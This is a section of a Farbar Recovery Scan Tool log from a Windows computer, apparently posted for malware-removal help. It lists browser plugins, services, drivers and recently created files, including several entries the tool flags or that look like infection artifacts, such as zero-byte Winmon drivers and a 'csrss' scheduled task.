FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
